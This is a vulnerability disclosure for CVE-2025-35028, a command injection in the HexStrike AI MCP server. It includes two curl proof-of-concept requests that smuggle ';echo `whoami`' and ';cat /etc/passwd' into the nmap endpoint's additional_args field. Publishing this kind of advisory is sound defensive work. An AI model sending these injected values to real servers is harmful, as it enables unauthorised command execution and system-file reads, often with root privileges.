CVE-2025-35028: HexStrike AI MCP Server Comamand Injection#

AHA! has discovered an issue with HexStrike AI from 0x4m4, and is issuing this disclosure in accordance with AHA!’s standard disclosure policy on November 30, 2025. CVE-2025-35028 has been assigned to this issue. Any questions about this disclosure should be directed to [email protected].

The GCVE identifier for this issue is GCVE-1337-2025-00000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011

Executive Summary#

HexStrike AI is a fairly popular model context protocol (MCP) server, having collected about five thousand stars on GitHub at the time of this disclosure, and has been forked over a thousand times. It is billed as an “AI-Powered MCP Cybersecurity Automation Platform,” and is likely shipping as part of other AI security products.

By providing a command-line argument starting with a semi-colon ; to an API endpoint created by the EnhancedCommandExecutor class of the HexStrike AI MCP server, the resultant composed command is executed directly in the context of the MCP server’s normal privilege; typically, this is root. There is no attempt to sanitize these arguments in the default configuration of this MCP server.

This appears to be an instance of CWE-78, and has an estimated CVSSv3.1 score of 9.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N). Note that this CVSS rating presumes the MCP server is run as-is in a default state, with no user authentication.

Technical Details#

It is trivial for an attacker to inject additional commands via the EnhancedCommandExecutor object, near https://github.com/0x4m4/hexstrike-ai/blob/master/hexstrike_server.py#L6783.

The below is a straightforward example using a typical nmap command exposed by EnhancedCommandExecutor, tested against commit 33267047667b9accfbf0fdac1c1c7ff12f3a5512 the shipping version on September 25, 2025 (this project does not appear to use version numbers or tagged releases.)

Demo 1:#

curl -X POST http://localhost:8888/api/tools/nmap \
  -H "Content-Type: application/json" \
  -d '{"target": "127.0.0.1", "scan_type": "-sV -Pn", "ports": "443,80,5000", "additional_args": ";echo `whoami`"}'|jq -r '.stdout'

Demo 2:#

curl -X POST http://localhost:8888/api/tools/nmap \
  -H "Content-Type: application/json" \
  -d '{"target": "127.0.0.1", "scan_type": "-sV -Pn", "ports": "443,80,5000", "additional_args": ";cat /etc/passwd"}'|jq -r '.stdout'

These demos return the results of the appended commands to the user via stdout.

Attacker Value#

Should this MCP server be bound to a network interface reachable over normal TCP/IP, this can lead to a total compromise of the MCP server’s environment. This is the normal configuration and usage of the hexstrike-ai MCP project, which, as mentioned, is a fairly popular API harness for providing cybersecurity tooling for evaluation and penetration testing.

Credit#

This issue was discovered and disclosed by jippen of AHA!.

Timeline#

  • 2025-09-25 (Thu): Presented at regularly scheduled AHA! meeting
  • 2025-10-01 (Wed): Disclosed to the vendor at [email protected]
  • 2025-11-20 (Thu): Reminder to the vendor of the upcoming disclosure
  • 2025-11-30 (Sun): Public disclosure of CVE-2025-35028